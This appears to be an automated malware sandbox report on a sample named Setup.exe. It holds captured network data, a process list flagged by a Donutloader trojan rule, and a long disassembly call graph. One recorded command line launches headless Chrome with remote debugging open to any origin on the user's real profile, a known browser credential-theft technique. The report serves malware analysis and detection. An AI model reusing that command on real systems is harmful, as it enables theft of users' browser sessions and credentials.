                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                    Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                                    Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                                    Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:15:27:22
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:76'542'479 bytes
                                                                                                                                                                                                                                                    MD5 hash:F18FA7132A5EDA29041FDD8AE85363DB
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:15:27:42
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:15:27:43
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:15:27:44
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236
                                                                                                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                    Start time:15:28:37
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1264
                                                                                                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:4.3%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                      Signature Coverage:37.8%
                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                      Total number of Limit Nodes:28
78363 31889a0 42 API calls 78362->78363 78364 319af86 78363->78364 78365 318b460 42 API calls 78364->78365 78366 319afcb 78365->78366 78367 3184b60 42 API calls 78366->78367 78368 319afdb 78367->78368 78369 31889a0 42 API calls 78368->78369 78370 319b02b 78369->78370 78371 3198710 73 API calls 78370->78371 78372 319b054 78371->78372 78373 318b460 42 API calls 78372->78373 78374 319b080 78373->78374 78375 3184b60 42 API calls 78374->78375 78376 319b090 78375->78376 78377 31889a0 42 API calls 78376->78377 78378 319b0c8 78377->78378 78379 3184c20 42 API calls 78378->78379 78380 319b0da 78379->78380 79164 31761b0 78380->79164 78382 319b0e6 78383 318b460 42 API calls 78382->78383 78384 319b11b 78383->78384 79173 319b760 78384->79173 78387 3187ff0 40 API calls 78388 319b143 78387->78388 79176 31756c0 78388->79176 78390 319b15f 79202 31760c0 78390->79202 78392 319b180 79218 3175c70 78392->79218 78394 319b24c __fread_nolock 78398 318b460 42 API calls 78394->78398 78395 319b187 78395->78394 78396 3186050 73 API calls 78395->78396 78397 319b1c7 78396->78397 78399 318b460 42 API calls 78397->78399 78400 319b28f 78398->78400 78401 319b1ef 78399->78401 78402 3178bf0 78 API calls 78400->78402 78403 31756c0 47 API calls 78401->78403 78404 319b2a5 78402->78404 78405 319b206 78403->78405 78406 3187ff0 40 API calls 78404->78406 78407 31760c0 5 API calls 78405->78407 78408 319b2b4 78406->78408 78409 319b227 78407->78409 78410 3185030 73 API calls 78408->78410 78411 3175c70 19 API calls 78409->78411 78412 319b2c7 78410->78412 78413 319b231 78411->78413 79227 3178de0 GetTempPathA 78412->79227 78415 3187ff0 40 API calls 78413->78415 78417 319b23d 78415->78417 78419 3187ff0 40 API calls 78417->78419 78418 319b332 78420 318b460 42 API calls 78418->78420 78419->78394 78422 319b359 78420->78422 79336 3179500 78422->79336 78425 319b2ef codecvt 79325 31747a0 78425->79325 78426 3187ff0 40 API calls 78427 319b387 78426->78427 78429 319b3f0 78427->78429 78430 319b390 Sleep 78427->78430 78433 
31c460e ___std_exception_destroy 14 API calls 78429->78433 78431 318b460 42 API calls 78430->78431 78440 319b3bf 78431->78440 78435 319b3f6 78433->78435 78441 3187ff0 40 API calls 78435->78441 78436 3179500 44 API calls 78436->78440 78439 3187ff0 40 API calls 78439->78440 78440->78429 78440->78430 78440->78436 78440->78439 78442 319b422 78441->78442 78443 3187ff0 40 API calls 78442->78443 78444 319b431 78443->78444 78445 3187ff0 40 API calls 78444->78445 78446 319b440 78445->78446 78447 31889a0 42 API calls 78446->78447 78448 319b44f 78447->78448 78449 3187ff0 40 API calls 78448->78449 78450 319b45e 78449->78450 78451 3187ff0 40 API calls 78450->78451 78452 319b470 78451->78452 78453 31a742b codecvt 5 API calls 78452->78453 78454 319b487 78453->78454 78454->77943 78458 31a5190 78455->78458 78456 31889a0 42 API calls 78457 319f9e2 78456->78457 78457->77946 78457->77948 78458->78456 78460 3187980 42 API calls 78459->78460 78461 3183844 78460->78461 78462 3187980 42 API calls 78461->78462 78463 3183857 78462->78463 78464 3187980 42 API calls 78463->78464 78465 318386a 78464->78465 78466 3187980 42 API calls 78465->78466 78467 318387b 78466->78467 78468 3187980 42 API calls 78467->78468 78469 318388c 78468->78469 78470 3187980 42 API calls 78469->78470 78471 318389d 78470->78471 78472 3187980 42 API calls 78471->78472 78473 31838ae 78472->78473 78474 3187980 42 API calls 78473->78474 78475 31838bf 78474->78475 78476 3185030 73 API calls 78475->78476 78477 31838cf 78476->78477 78478 31889a0 42 API calls 78477->78478 78479 3183909 78478->78479 78480 3185030 73 API calls 78479->78480 78481 3183915 78480->78481 78482 31889a0 42 API calls 78481->78482 78483 318394f 78482->78483 78484 3185030 73 API calls 78483->78484 78485 318395b 78484->78485 78486 31889a0 42 API calls 78485->78486 78487 318399a 78486->78487 78488 3185030 73 API calls 78487->78488 78489 31839a6 78488->78489 78490 31889a0 42 API calls 78489->78490 78491 31839e2 78490->78491 78492 3185030 73 API calls 
78491->78492 78493 31839ee 78492->78493 78494 31889a0 42 API calls 78493->78494 78495 3183a2a 78494->78495 78496 3185030 73 API calls 78495->78496 78497 3183a36 78496->78497 78498 31889a0 42 API calls 78497->78498 78543->77938 78545->78018 78546->78022 78547->77957 78548->77969 78558 31ab895 78549->78558 78553 3176b59 78552->78553 78554 3176ba3 78553->78554 78555 318b460 42 API calls 78553->78555 78556 31a742b codecvt 5 API calls 78554->78556 78555->78554 78557 3176bfe 78556->78557 78557->78057 78559 31ab8d1 GetSystemTimeAsFileTime 78558->78559 78560 31a910f 78558->78560 78559->78560 78560->78054 78564 31a7228 __fread_nolock 78561->78564 78571 31a7401 78561->78571 78562 31a742b codecvt 5 API calls 78563 3178c38 78562->78563 78563->78066 78564->78564 78565 31a727d WideCharToMultiByte 78564->78565 78568 31cc92a 44 API calls 78564->78568 78569 318b460 42 API calls 78564->78569 78570 3187ff0 40 API calls 78564->78570 78564->78571 78591 31c4176 40 API calls 2 library calls 78564->78591 78590 31c4176 40 API calls 2 library calls 78565->78590 78568->78564 78569->78564 78570->78564 78571->78562 78573 31a6fff 78572->78573 78578 31a7015 78572->78578 78574 3187ff0 40 API calls 78573->78574 78575 31a700e 78574->78575 78579 31a742b codecvt 5 API calls 78575->78579 78577 3187ff0 40 API calls 78577->78575 78582 31a71b0 78578->78582 78583 31a71ba 78578->78583 78587 318b460 42 API calls 78578->78587 78588 3187ff0 40 API calls 78578->78588 78589 31a713f 78578->78589 78592 31c4593 14 API calls __dosmaperr 78578->78592 78593 31c96c7 43 API calls __fread_nolock 78578->78593 78581 3178c70 78579->78581 78581->78070 78594 31a86ea 42 API calls 2 library calls 78582->78594 78595 31a872a 42 API calls 2 library calls 78583->78595 78587->78578 78588->78578 78589->78577 78590->78564 78591->78564 78592->78578 78593->78578 78597 318d5fb codecvt 78596->78597 78598 318d5d4 78596->78598 78597->78092 78598->78597 78600 318d62b 78598->78600 78601 318d622 78598->78601 78603 318d5e1 78598->78603 78599 
31a763e moneypunct 42 API calls 78602 318d5f4 78599->78602 78605 31a763e moneypunct 42 API calls 78600->78605 78601->78603 78604 318d674 78601->78604 78602->78597 78611 31cc0b9 40 API calls 2 library calls 78602->78611 78603->78599 78610 3176690 42 API calls 2 library calls 78604->78610 78605->78597 78609->78091 78610->78602 78613 3185e15 78612->78613 78616 3185e25 codecvt 78613->78616 78617 318b220 78613->78617 78615 3185e6d 78615->78095 78616->78095 78618 318b368 78617->78618 78619 318b24a 78617->78619 78632 31768f0 42 API calls codecvt 78618->78632 78622 318b260 78619->78622 78625 318b2be 78619->78625 78626 318b2b1 78619->78626 78629 318b270 codecvt 78619->78629 78621 318b36d 78633 3176690 42 API calls 2 library calls 78621->78633 78624 31a763e moneypunct 42 API calls 78622->78624 78624->78629 78628 31a763e moneypunct 42 API calls 78625->78628 78626->78621 78626->78622 78628->78629 78631 318b326 codecvt _Mpunct 78629->78631 78634 31cc0b9 40 API calls 2 library calls 78629->78634 78631->78615 78632->78621 78633->78629 78636 319efa6 78635->78636 78646 319f110 codecvt 78635->78646 78637 319f1c2 78636->78637 78638 319efc6 78636->78638 78636->78646 78660 3189290 42 API calls 78637->78660 78639 319efdb 78638->78639 78644 319f040 78638->78644 78645 319f030 78638->78645 78651 319eff1 codecvt 78638->78651 78643 31a763e moneypunct 42 API calls 78639->78643 78641 319f1c7 78661 3176690 42 API calls 2 library calls 78641->78661 78643->78651 78647 31a763e moneypunct 42 API calls 78644->78647 78645->78639 78645->78641 78646->78116 78647->78651 78654 319f0de _Mpunct 78651->78654 78662 31cc0b9 40 API calls 2 library calls 78651->78662 78654->78116 78661->78651 78664 31cc597 78663->78664 78665 31cc5b3 78663->78665 78664->78131 78666 31d3639 __Getctype 40 API calls 78665->78666 78667 31cc5b8 78666->78667 78668 31d44c6 __Getctype 40 API calls 78667->78668 78669 31cc5c8 78668->78669 78669->78664 78687 31d655d 43 API calls 3 library calls 78669->78687 78671 31cc5fa 78671->78131 78673 
318ba9a 78672->78673 78677 318b994 78672->78677 78688 31768f0 42 API calls codecvt 78673->78688 78675 318ba9f 78689 3176690 42 API calls 2 library calls 78675->78689 78676 318b9ba codecvt 78686 318ba5c codecvt _Mpunct 78676->78686 78690 31cc0b9 40 API calls 2 library calls 78676->78690 78677->78676 78679 318ba08 78677->78679 78680 318b9fb 78677->78680 78682 318b9aa 78677->78682 78683 31a763e moneypunct 42 API calls 78679->78683 78680->78675 78680->78682 78681 31a763e moneypunct 42 API calls 78681->78676 78682->78681 78683->78676 78686->78131 78687->78671 78688->78675 78689->78676 78691->78138 78692->78142 78695 31901ac 78694->78695 78696 31c9a4a moneypunct 40 API calls 78695->78696 78697 319027f 78696->78697 78774 318ded0 78697->78774 78699 3189fad 78700 318c590 78699->78700 78701 318c5de __fread_nolock 78700->78701 78702 318c867 78700->78702 78851 318d860 42 API calls 78701->78851 78860 3191710 42 API calls codecvt 78702->78860 78704 318c8b2 78705 318ded0 45 API calls 78704->78705 78706 318c8c2 78705->78706 78709 318b460 42 API calls 78706->78709 78711 318c9e6 78706->78711 78708 318c662 78852 3190970 74 API calls codecvt 78708->78852 78714 318c8fe 78709->78714 78710 318ca46 78867 318d7d0 40 API calls _Mpunct 78710->78867 78711->78710 78715 3187980 42 API calls 78711->78715 78861 318d9b0 42 API calls codecvt 78714->78861 78719 318c9f9 78715->78719 78716 318c677 78720 318ded0 45 API calls 78716->78720 78717 318c862 78721 31a742b codecvt 5 API calls 78717->78721 78723 31889a0 42 API calls 78719->78723 78724 318c687 78720->78724 78726 3189fc0 78721->78726 78722 318c919 78862 3191540 42 API calls codecvt 78722->78862 78723->78710 78725 318c79c 78724->78725 78728 318b460 42 API calls 78724->78728 78729 318c7e9 78725->78729 78730 318c7a2 78725->78730 78769 318c310 78726->78769 78732 318c6b7 78728->78732 78734 318c850 78729->78734 78738 3187980 42 API calls 78729->78738 78733 3187980 42 API calls 78730->78733 78731 318c947 78863 318dcd0 42 API calls codecvt 78731->78863 
78853 318d9b0 42 API calls codecvt 78732->78853 78737 318c7af 78733->78737 78859 318d6b0 42 API calls 78734->78859 78745 31889a0 42 API calls 78737->78745 78738->78737 78739 318c962 78864 3192300 42 API calls Concurrency::cancel_current_task 78739->78864 78741 318c6cf 78854 3191540 42 API calls codecvt 78741->78854 78743 318c972 78746 3187ff0 40 API calls 78743->78746 78745->78734 78748 318c981 78746->78748 78747 318c6fd 78855 318dcd0 42 API calls codecvt 78747->78855 78865 31bf79c 14 API calls ___std_exception_destroy 78748->78865 78751 318c718 78856 31916d0 42 API calls Concurrency::cancel_current_task 78751->78856 78752 318c9ab 78866 31bf79c 14 API calls ___std_exception_destroy 78752->78866 78755 318c72b 78757 3187ff0 40 API calls 78755->78757 78756 318c9c5 78758 3187ff0 40 API calls 78756->78758 78759 318c73a 78757->78759 78760 318c9d7 78758->78760 78857 31bf79c 14 API calls ___std_exception_destroy 78759->78857 78762 3187ff0 40 API calls 78760->78762 78762->78711 78763 318c764 78858 31bf79c 14 API calls ___std_exception_destroy 78763->78858 78765 318c77e 78766 3187ff0 40 API calls 78765->78766 78767 318c790 78766->78767 78768 3187ff0 40 API calls 78767->78768 78768->78725 78770 3187ff0 40 API calls 78769->78770 78771 318c356 78770->78771 78772 3187dc0 40 API calls 78771->78772 78773 3189fcf 78772->78773 78773->78167 78775 318dee9 78774->78775 78779 318df2c 78774->78779 78840 318f740 42 API calls 78775->78840 78778 318deee 78778->78779 78841 318f740 42 API calls 78778->78841 78843 318e350 42 API calls 78779->78843 78780 318df83 78781 318e0c9 78780->78781 78783 318dfda 78780->78783 78784 318e03b 78780->78784 78785 318df9e 78780->78785 78786 318e09f 78780->78786 78787 318dfb2 78780->78787 78788 318e0b5 78780->78788 78789 318e016 78780->78789 78790 318e089 78780->78790 78791 318dfee 78780->78791 78792 318e002 78780->78792 78793 318e064 78780->78793 78794 318dfc6 78780->78794 78799 31a742b codecvt 5 API calls 78781->78799 78811 31a742b codecvt 5 API calls 
78783->78811 78847 318e3e0 42 API calls 78784->78847 78805 31a742b codecvt 5 API calls 78785->78805 78850 318e4a0 45 API calls 2 library calls 78786->78850 78807 31a742b codecvt 5 API calls 78787->78807 78798 31a742b codecvt 5 API calls 78788->78798 78846 318e3e0 42 API calls 78789->78846 78849 318ed70 42 API calls codecvt 78790->78849 78797 31a742b codecvt 5 API calls 78791->78797 78800 31a742b codecvt 5 API calls 78792->78800 78848 318e3e0 42 API calls 78793->78848 78809 31a742b codecvt 5 API calls 78794->78809 78795 318defc 78810 318df11 78795->78810 78842 318f740 42 API calls 78795->78842 78814 318dffe 78797->78814 78812 318e0c5 78798->78812 78815 318e0e0 78799->78815 78816 318e012 78800->78816 78803 318df5b 78803->78780 78803->78781 78844 318ec40 42 API calls 78803->78844 78845 318e350 42 API calls 78803->78845 78821 318dfae 78805->78821 78822 318dfc2 78807->78822 78825 318dfd6 78809->78825 78813 31a742b codecvt 5 API calls 78810->78813 78826 318dfea 78811->78826 78812->78699 78827 318df28 78813->78827 78814->78699 78815->78699 78816->78699 78817 318e02c 78828 31a742b codecvt 5 API calls 78817->78828 78818 318e055 78829 31a742b codecvt 5 API calls 78818->78829 78819 318e07a 78831 31a742b codecvt 5 API calls 78819->78831 78820 318e090 78832 31a742b codecvt 5 API calls 78820->78832 78821->78699 78822->78699 78824 318e0a6 78833 31a742b codecvt 5 API calls 78824->78833 78825->78699 78826->78699 78827->78699 78835 318e037 78828->78835 78836 318e060 78829->78836 78837 318e085 78831->78837 78838 318e09b 78832->78838 78839 318e0b1 78833->78839 78834 318df0a 78834->78779 78834->78810 78835->78699 78836->78699 78837->78699 78838->78699 78839->78699 78840->78778 78841->78795 78842->78834 78843->78803 78844->78803 78845->78803 78846->78817 78847->78818 78848->78819 78849->78820 78850->78824 78851->78708 78852->78716 78853->78741 78854->78747 78855->78751 78856->78755 78857->78763 78858->78765 78859->78717 78860->78704 78861->78722 78862->78731 78863->78739 78864->78743 
78865->78752 78866->78756 78867->78717 78869 3197f98 78868->78869 78879 3198040 78868->78879 78870 31a763e moneypunct 42 API calls 78869->78870 78871 3197fba 78870->78871 78872 3186050 73 API calls 78871->78872 78873 3197fd0 78872->78873 78874 3185030 73 API calls 78873->78874 78875 3197fe0 78874->78875 78876 3197f50 73 API calls 78875->78876 78877 3198031 78876->78877 78878 3197f50 73 API calls 78877->78878 78878->78879 78879->78210 78881 31a763e moneypunct 42 API calls 78880->78881 78882 318b83c 78881->78882 78883 318b95d 78882->78883 78885 318b884 78882->78885 78894 318b919 78882->78894 78905 3189290 42 API calls 78883->78905 78884 31a742b codecvt 5 API calls 78886 318b959 78884->78886 78888 318b8c0 78885->78888 78889 318b897 78885->78889 78898 318b88b 78885->78898 78886->78210 78893 31a763e moneypunct 42 API calls 78888->78893 78890 318b962 78889->78890 78891 318b8a2 78889->78891 78906 3176690 42 API calls 2 library calls 78890->78906 78896 31a763e moneypunct 42 API calls 78891->78896 78893->78898 78894->78884 78895 3185030 73 API calls 78895->78898 78899 318b8a8 78896->78899 78897 318b967 78907 31cc0b9 40 API calls 2 library calls 78897->78907 78898->78894 78898->78895 78899->78897 78899->78898 78903->78208 78906->78897 78909 318feba 78908->78909 78910 318fee0 78908->78910 78909->78232 79355 3198470 42 API calls 78910->79355 78912 318fef9 79356 3192390 42 API calls codecvt 78912->79356 78914 318ff0e 78915 31bf9ce Concurrency::cancel_current_task KiUserExceptionDispatcher 78914->78915 78916 318ff1f 78915->78916 79357 3189920 78917->79357 78919 3189a52 78919->78258 78921 317694c 78920->78921 78922 31769be 78921->78922 78923 318b460 42 API calls 78921->78923 78924 31a742b codecvt 5 API calls 78922->78924 78923->78922 78925 3176a1a 78924->78925 78925->78267 79373 318d3b0 78926->79373 78928 318a76e 78928->78273 78930 318b460 42 API calls 78929->78930 78931 319a197 78930->78931 78932 3184b60 42 API calls 78931->78932 78933 319a1a9 78932->78933 78934 318fe80 42 API 
calls 78933->78934 78935 319a1d7 78934->78935 78936 318b460 42 API calls 78935->78936 78937 319a1e8 78936->78937 78938 31a71d0 48 API calls 78937->78938 78939 319a209 78938->78939 78940 3187ff0 40 API calls 78939->78940 78941 319a21a 78940->78941 78942 318b460 42 API calls 78941->78942 78943 319a245 78942->78943 78944 3184b60 42 API calls 78943->78944 78945 319a25b 78944->78945 78946 3189a20 42 API calls 78945->78946 78947 319a26e 78946->78947 78948 31a6fc0 45 API calls 78947->78948 78949 319a27f __fread_nolock 78948->78949 78950 319a565 78949->78950 78953 319a2ff 78949->78953 78954 319a516 78949->78954 78951 31a742b codecvt 5 API calls 78950->78951 78952 319a57e 78951->78952 78989 319ba10 78952->78989 78955 319a308 78953->78955 78956 319a3a0 78953->78956 78954->78950 78957 318b460 42 API calls 78954->78957 78958 319a34a 78955->78958 78959 319a316 78955->78959 78956->78950 78961 319a468 78956->78961 78962 319a40f 78956->78962 78963 319a4c1 78956->78963 78964 319a3b6 78956->78964 78960 319a33e 78957->78960 78966 319a38a 78958->78966 78967 319a374 78958->78967 78965 318b460 42 API calls 78959->78965 78979 3184b60 42 API calls 78960->78979 78968 319a4ab 78961->78968 78969 319a495 78961->78969 78974 319a43c 78962->78974 78975 319a452 78962->78975 78972 319a4ec 78963->78972 78973 319a501 78963->78973 78970 319a3f9 78964->78970 78971 319a3e3 78964->78971 78965->78960 78977 318b460 42 API calls 78966->78977 78976 318b460 42 API calls 78967->78976 78981 318b460 42 API calls 78968->78981 78978 318b460 42 API calls 78969->78978 78982 318b460 42 API calls 78970->78982 78980 318b460 42 API calls 78971->78980 78983 318b460 42 API calls 78972->78983 78985 318b460 42 API calls 78973->78985 78984 318b460 42 API calls 78974->78984 78986 318b460 42 API calls 78975->78986 78976->78960 78977->78960 78978->78960 78987 319a55d 78979->78987 78980->78960 78981->78960 78982->78960 78983->78960 78984->78960 78985->78960 78986->78960 79393 3190330 42 API calls codecvt 78987->79393 78990 
31889a0 42 API calls 78989->78990 78991 319ba5e 78990->78991 78992 31a763e moneypunct 42 API calls 78991->78992 78993 319ba70 78992->78993 78994 31a742b codecvt 5 API calls 78993->78994 78995 319a9a6 78994->78995 78995->78285 78997 318b460 42 API calls 78996->78997 78998 31993a3 78997->78998 78999 3184b60 42 API calls 78998->78999 79000 31993b5 78999->79000 79001 318fe80 42 API calls 79000->79001 79002 31993e9 79001->79002 79003 318b460 42 API calls 79002->79003 79004 3199400 79003->79004 79005 31a71d0 48 API calls 79004->79005 79006 3199421 79005->79006 79007 3187ff0 40 API calls 79006->79007 79008 3199432 79007->79008 79009 318b460 42 API calls 79008->79009 79010 319945d 79009->79010 79011 3184b60 42 API calls 79010->79011 79012 319946f 79011->79012 79013 3189a20 42 API calls 79012->79013 79014 3199482 79013->79014 79015 31a6fc0 45 API calls 79014->79015 79016 3199493 79015->79016 79016->79016 79017 318b460 42 API calls 79016->79017 79018 31994fc 79017->79018 79019 3187ff0 40 API calls 79018->79019 79020 3199568 79019->79020 79021 31a742b codecvt 5 API calls 79020->79021 79022 3199581 79021->79022 79022->78295 79024 31889a0 42 API calls 79023->79024 79025 319874d 79024->79025 79026 31a763e moneypunct 42 API calls 79025->79026 79027 319875f 79026->79027 79028 3186050 73 API calls 79027->79028 79029 319877c 79028->79029 79030 31a742b codecvt 5 API calls 79029->79030 79031 31987aa 79030->79031 79031->78307 79033 318b460 42 API calls 79032->79033 79034 3199f9a 79033->79034 79035 3184b60 42 API calls 79034->79035 